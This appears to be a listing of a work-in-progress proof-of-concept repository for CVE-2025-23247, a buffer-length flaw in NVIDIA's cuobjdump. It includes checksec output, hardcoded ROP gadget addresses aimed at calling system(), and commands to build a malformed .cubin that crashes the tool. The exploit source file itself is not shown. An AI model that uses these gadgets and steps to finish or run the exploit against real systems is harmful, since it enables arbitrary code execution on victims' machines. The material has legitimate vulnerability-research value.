
CVE-2025-23247 PoC — NVIDIA CUDA toolkit security vulnerability

Associated Vulnerability
Title: NVIDIA CUDA toolkit security vulnerability (CVE-2025-23247)
Description: NVIDIA CUDA Toolkit for all platforms contains a vulnerability in the cuobjdump binary, where a failure to check the length of a buffer could allow a user to cause the tool to crash or execute arbitrary code by passing in a malformed ELF file. A successful exploit of this vulnerability might lead to arbitrary code execution.
Description
wip for CVE-2025-23247. ATM just crash PoC which shows we control buffer and offset, so we got aaw.
Readme
# CVE-2025-23247
Epic Collab with @reubensammut :) as always :)
wip for CVE-2025-23247. ATM just crash PoC which shows we control buffer and offset, so we got aaw.
Bug from https://talosintelligence.com/vulnerability_reports/TALOS-2025-2151

```
checksec ./cuobjdump
[*] '/home/vlad/cuobjdump'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
```

Anyways we get no PIE so:

```c
uint64_t system_plt = 0x401d90;
uint64_t pop_rdi_ret = 0x402d1b;
uint64_t ret_gadget = 0x402d1c;  // Just a ret
```

Crashpoint
![Screenshot_from_2025-11-20_16-00-41 png-2](https://github.com/user-attachments/assets/0e319b6d-2444-4e22-9479-35e976692a38)

```
gcc -o modify_simple modify_simple.c
vlad@Vlad-PC:~$ ./modify_simple simple.cubin modified_simple2.cubin
Created modified_simple2.cubin with vulnerable .nv_debug_source section
Run: ./cuobjdump --dump-elf modified_simple2.cubin
```

And for the CUDA kernel:

```
nvcc -ptx simple.cu -o simple.ptx
nvcc -cubin simple.ptx -o simple.cubin --generate-line-info
```

or

```
nvcc -cubin simple.cu -o simple.cubin --generate-line-info
```
File Snapshot

[4.0K] /data/pocs/8aae502ef489f69646a21af58f24fd46c7b8d058
├── [4.0K] modify_simple.c
├── [1.1K] README.md
└── [ 168] simple.cu

1 directory, 3 files